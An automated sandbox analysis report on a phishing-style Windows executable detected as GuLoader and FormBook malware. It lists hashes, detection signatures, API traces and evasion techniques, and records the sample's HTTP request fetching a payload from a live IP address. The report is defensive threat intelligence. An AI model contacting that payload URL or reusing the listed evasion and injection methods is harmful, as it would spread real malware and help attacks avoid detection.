Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order Purchase Order Purchase Order Purchase Order.exe

Overview

General Information

Sample name:Purchase Order Purchase Order Purchase Order Purchase Order.exe
Analysis ID:1557894
MD5:b9a03fb0c2c7f23a1e4ccb0d79c5053c
SHA1:4d87c4ed89d8b92f2b6849dc6af6a8850f8e5e7c
SHA256:099369eb025c3e23b6669c872ac2572e7bc4ba9200eb4d6318284983ddb78e3f
Tags:exeGuLoaderuser-abuse_ch
Infos:

Detection

FormBook, GuLoader
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2689733923.0000000034480000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.1914988033.0000000003FC1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-18T18:19:35.134009+010028032702Potentially Bad Traffic192.168.2.753200185.222.57.9080TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: http://185.222.57.90/zFSrvbrRquo53.binAvira URL Cloud: Label: malware
      Multi AV Scanner detection for submitted file
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeReversingLabs: Detection: 27%
      Yara detected FormBook
      Source: Yara matchFile source: 0000000B.00000002.2689733923.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.0000000000649000.00000008.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2322463653.000000003448D000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2324475772.000000003463C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2322463653.000000003448D000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2324475772.000000003463C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.0000000000649000.00000008.00000001.01000000.00000006.sdmp
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,5_2_004059CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_004065FD FindFirstFileW,FindClose,5_2_004065FD
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_00402868 FindFirstFileW,5_2_00402868
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:53200 -> 185.222.57.90:80
      Source: global trafficHTTP traffic detected: GET /zFSrvbrRquo53.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 185.222.57.90Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: global trafficHTTP traffic detected: GET /zFSrvbrRquo53.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 185.222.57.90Cache-Control: no-cache
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668899476.0000000004688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.90/
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668899476.0000000004688000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689244390.0000000033CC0000.00000004.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668899476.00000000046C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.90/zFSrvbrRquo53.bin
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668899476.0000000004688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.90/zFSrvbrRquo53.bin55
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668899476.00000000046C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.90/zFSrvbrRquo53.binj
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.00000000005F2000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.00000000005F2000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,LdrInitializeThunk,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_00405461

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000B.00000002.2689733923.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Initial sample is a PE file and has a suspicious name
      Source: initial sampleStatic PE information: Filename: Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348635C0 NtCreateMutant,LdrInitializeThunk,11_2_348635C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_34862C70
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_34862DF0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862B60 NtClose,LdrInitializeThunk,11_2_34862B60
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34863090 NtSetValueKey,11_2_34863090
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34863010 NtOpenDirectoryObject,11_2_34863010
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34863D10 NtOpenProcessToken,11_2_34863D10
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34863D70 NtOpenThread,11_2_34863D70
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348639B0 NtGetContextThread,11_2_348639B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34864650 NtSuspendThread,11_2_34864650
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34864340 NtSetContextThread,11_2_34864340
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862CA0 NtQueryInformationToken,11_2_34862CA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862CC0 NtQueryVirtualMemory,11_2_34862CC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862CF0 NtOpenProcess,11_2_34862CF0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862C00 NtQueryInformationProcess,11_2_34862C00
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862C60 NtCreateKey,11_2_34862C60
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862DB0 NtEnumerateKey,11_2_34862DB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862DD0 NtDelayExecution,11_2_34862DD0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862D00 NtSetInformationFile,11_2_34862D00
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862D10 NtMapViewOfSection,11_2_34862D10
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862D30 NtUnmapViewOfSection,11_2_34862D30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862E80 NtReadVirtualMemory,11_2_34862E80
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862EA0 NtAdjustPrivilegesToken,11_2_34862EA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862EE0 NtQueueApcThread,11_2_34862EE0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862E30 NtWriteVirtualMemory,11_2_34862E30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862F90 NtProtectVirtualMemory,11_2_34862F90
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862FA0 NtQuerySection,11_2_34862FA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862FB0 NtResumeThread,11_2_34862FB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862FE0 NtCreateFile,11_2_34862FE0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862F30 NtCreateSection,11_2_34862F30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862F60 NtCreateProcessEx,11_2_34862F60
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862AB0 NtWaitForSingleObject,11_2_34862AB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862AD0 NtReadFile,11_2_34862AD0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862AF0 NtWriteFile,11_2_34862AF0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862B80 NtQueryInformationFile,11_2_34862B80
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862BA0 NtEnumerateValueKey,11_2_34862BA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862BE0 NtQueryValueKey,11_2_34862BE0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34862BF0 NtAllocateVirtualMemory,11_2_34862BF0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_0040338F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,5_2_0040338F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Windows\Fonts\Gullis.lnkJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_00404C9E5_2_00404C9E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_00406B155_2_00406B15
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_004072EC5_2_004072EC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_73CF1B635_2_73CF1B63
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EF43F11_2_348EF43F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482146011_2_34821460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CD5B011_2_348CD5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E757111_2_348E7571
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E16CC11_2_348E16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EF7B011_2_348EF7B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348217EC11_2_348217EC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483B73011_2_3483B730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DF0CC11_2_348DF0CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E70E911_2_348E70E9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EF0E011_2_348EF0E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483B1B011_2_3483B1B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3486516C11_2_3486516C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F17211_2_3481F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348352A011_2_348352A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D12ED11_2_348D12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484D2F011_2_3484D2F0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E132D11_2_348E132D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481D34C11_2_3481D34C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EFCF211_2_348EFCF2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34849C2011_2_34849C20
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E1D5A11_2_348E1D5A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E7D7311_2_348E7D73
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34839EB011_2_34839EB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831F9211_2_34831F92
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EFFB111_2_348EFFB1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EFF0911_2_348EFF09
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348338E011_2_348338E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3489D80011_2_3489D800
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C591011_2_348C5910
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484B95011_2_3484B950
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CDAAC11_2_348CDAAC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34875AA011_2_34875AA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D1AA311_2_348D1AA3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DDAC611_2_348DDAC6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E7A4611_2_348E7A46
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A3A6C11_2_348A3A6C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A5BF011_2_348A5BF0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3486DBF911_2_3486DBF9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EFB7611_2_348EFB76
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D442011_2_348D4420
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E244611_2_348E2446
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F059111_2_348F0591
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483053511_2_34830535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484C6E011_2_3484C6E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482C7C011_2_3482C7C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485475011_2_34854750
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483077011_2_34830770
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C200011_2_348C2000
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F21AE11_2_348F21AE
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F01AA11_2_348F01AA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E81CC11_2_348E81CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482010011_2_34820100
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CA11811_2_348CA118
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348B815811_2_348B8158
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348B02C011_2_348B02C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D027411_2_348D0274
